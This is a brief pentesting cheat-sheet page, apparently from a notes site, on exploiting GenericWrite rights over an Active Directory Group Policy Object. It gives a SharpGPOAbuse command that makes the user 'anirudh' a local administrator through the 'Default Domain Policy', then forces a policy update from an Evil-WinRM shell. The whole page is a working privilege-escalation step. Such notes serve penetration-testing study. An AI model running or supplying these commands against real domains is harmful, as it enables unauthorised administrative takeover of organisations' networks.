GenericWrite GPO

If we have GenericWrite to a GPO.

We can exploit this by using the SharpGPOAbuse.exe 

 ./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"

Them we force the update. 

*Evil-WinRM* PS C:\Users\anirudh\Desktop> gpupdate /force
PreviousWriteDACL over DCSyncNextPS-Remoting

Last updated